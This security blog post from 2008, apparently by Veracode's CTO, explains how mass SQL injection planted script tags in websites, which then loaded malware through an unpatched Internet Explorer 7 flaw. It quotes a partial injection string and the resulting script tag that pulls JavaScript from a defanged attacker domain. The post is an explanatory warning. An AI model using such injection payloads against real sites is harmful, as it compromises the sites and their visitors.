And the results are not graceful. Unless you have been living under a rock you have heard about the latest Internet Explorer 7 unpatched vulnerability. If you browse a web site that has been modified to contain malicious JavaScript it will download malware to your Windows machine. I first caught wind of it over the weekend when a friend said he was browsing a legitimate training web site when suddenly he saw his Internet Explorer status line change to, "Databinding...". That will make your pulse quicken. AV was useless in stopping the attack. Attackers have been finding web sites that have vulnerabilities in them that allow the modification of content on the web site. By far the most popular vulnerability is SQL Injection. Attackers inject a string like the following into a form field:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM

They then hope that the data will get read back out of the SQL database at some point and the web app will send the following Javascript to a browser.

<script src=http://17gamo [dot] com/1.js></script>

The victim's browser then pulls the malicious JavaScript and the browser gets owned. Internet Storm Center has another nice example where the JavaScript is injected as a cookie value. It Takes Two to Tango This is an example of a vulnerability where it takes two to tango. Not only does it require a vulnerable client program connecting to untrusted data on the internet. To spread widely, it requires vulnerable web applications that an attacker can use to host the malicious payload. I have also heard of ad servers downloading the malicious payload right along with banner ads for Fortune 500 companies. One of the big lessons here is there is no "safe" area of the internet to browse. Something that concerns me is the organizations with the vulnerable web applications don't know it or don't care. They don't have the brand damage of a large software company such as Microsoft so thousands of small vulnerable web apps keep serving up the latest and gratest malicious payloads for the latest client vulnerabilities. If it isn't Internet Explorer, like this week, it might be Firefox or Flash or a media plug in. Insecure web applications are helping the criminals win.

About Chris Wysopal

Chris Wysopal, co-founder and CTO of Veracode, is recognized as an expert and a well-known speaker in the information security field. He has given keynotes at computer security events and has testified on Capitol Hill on the subjects of government computer security and how vulnerabilities are discovered in software. His opinions on Internet security are highly sought after and most major print and media outlets have featured stories on Mr. Wysopal and his work. At Veracode, Mr. Wysopal is responsible for the security analysis capabilities of Veracode technology.

Comments (2)

Miguel Correia | December 17, 2008 1:29 pm

Great post. There is a third in the tango: cross-site scripting. This is a heap overflow attack, made using a stored cross-site scripting attack made with SQL injection. Yak!

cwysopal | December 17, 2008 7:26 pm


Agreed. Perhaps I should change the title to "IE has a three way with SQL Injection and XSS".


Please Post Your Comments & Reviews

Your email address will not be published. Required fields are marked *

Love to learn about Application Security?

Get all the latest news, tips and articles delivered right to your inbox.